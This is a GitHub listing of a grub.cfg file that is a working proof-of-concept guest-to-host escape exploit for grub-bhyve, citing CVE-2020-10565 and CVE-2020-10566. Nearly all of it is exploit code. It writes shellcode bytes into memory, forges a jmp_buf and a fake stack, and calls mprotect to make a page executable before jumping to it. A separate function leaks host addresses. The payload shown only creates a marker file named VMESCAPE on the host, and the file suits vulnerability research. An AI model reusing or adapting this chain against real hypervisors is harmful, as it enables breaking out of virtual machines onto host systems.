-
Notifications
You must be signed in to change notification settings - Fork 2
/
grub.cfg
119 lines (95 loc) · 3.49 KB
/
grub.cfg
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
function exploit {
set longjmp=0x00402AC0
set fakestack=0x00777000
set mprotect=0x00402830
set handleinit=0x00402CA8
set ctorlist=0x00758000
set ret=0x00402462
set shellcode=0x00778000
set grubreboot=0x00405AB6
# write shellcode to RWX page
write_dword $shellcode 0x0001f368 # create a file VMESCAPE in the root directory
write_dword 0x00778004 0x9c6a5800
write_dword 0x00778008 0x56bb485f
write_dword 0x0077800c 0x4353454d
write_dword 0x00778010 0x6a455041
write_dword 0x00778014 0x5e545300
write_dword 0x00778018 0x00060168
write_dword 0x0077801c 0x31485a00
write_dword 0x00778020 0x48050fc9
write_dword 0x00778024 0xc310c483
# set up return address in fakestack at an offset 0x40 for handle_static_init gadget
write_dword 0x00777040 $mprotect # make page RWX
write_dword 0x00777044 0
write_dword 0x00777048 $shellcode # execute payload
write_dword 0x0077704c 0
write_dword 0x00777050 $grubreboot # exit clean
write_dword 0x00777054 0
# set up fake jmp_buf
write_dword 0x007765c0 $handleinit # RCX, returns into this address
write_dword 0x007765c4 0
write_dword 0x007765c8 0 # RBX, set to 0 for use in handle_static_init gadget
write_dword 0x007765cc 0
write_dword 0x007765d0 $fakestack # RSP, fake stack
write_dword 0x007765d4 0
write_dword 0x007765d8 0xbbbbbbbb # RBP
write_dword 0x007765dc 0
write_dword 0x007765e0 $shellcode # R12, later becomes RDI for mprotect
write_dword 0x007765e4 0
write_dword 0x007765e8 0 # R13, set to 0 for use in handle_static_init gadget
write_dword 0x007765ec 0
write_dword 0x007765f0 0x7 # R14, later becomes RDX for mprotect
write_dword 0x007765f4 0
write_dword 0x007765f8 0x2000 # R15, later becomes RSI for mprotect
write_dword 0x007765fc 0
# set up fake struct grub_preboot
write_dword 0x007764c0 $longjmp # overwrite preboot_func with longjmp@plt
write_dword 0x007764c4 0x0
# overwrite data structures used by boot command
write_dword 0x007739CC 0x1 # set grub_loader_loaded flag
write_dword 0x007739C8 0x007765c0 # unset grub_loader_flags, also points to fake jmp_buf
write_dword 0x007739D0 0x007764c0 # fake preboots_head_low, points to dns_cache in .bss section
write_dword 0x007739D4 0x0 # fake preboots_head_hi
# set up for handle_static_init gadget
write_dword $ctorlist $ret # overwrite ctorlist_low
write_dword 0x00758004 0x0 # overwrite ctorlist_hi
# run exploit only once
set run_exploit=false
save_env run_exploit
# trigger the payload
boot
}
function leak {
set bhyve_g2h_lo=0x007737f0
set bhyve_g2h_hi=0x007737f4
read_dword -v baseaddr_lo $bhyve_g2h_lo
read_dword -v baseaddr_hi $bhyve_g2h_hi
save_env baseaddr_lo
save_env baseaddr_hi
set run_leak=false
save_env run_leak
}
function fontbug {
set run_fontbug=false
save_env run_fontbug
loadfont /boot/grub/fontbug.pf2
}
# remove the timeout if interactive boot is needed for attaching gdb to grub-bhyve #
set timeout=0 # boot without interaction
menuentry 'Ubuntu' {
load_env
# trigger the exploit based on the provided guest environment variables #
# CVE-2020-10565
if [ "${run_exploit}" = true ]; then
exploit
fi
if [ "${run_leak}" = true ]; then
leak
fi
# CVE-2020-10566
if [ "${run_fontbug}" = true ]; then
fontbug
fi
linux /boot/vmlinuz-4.4.0-142-generic root=UUID=696b0fd4-b67d-4ff0-8d75-1034c91de433 ro
initrd /boot/initrd.img-4.4.0-142-generic
}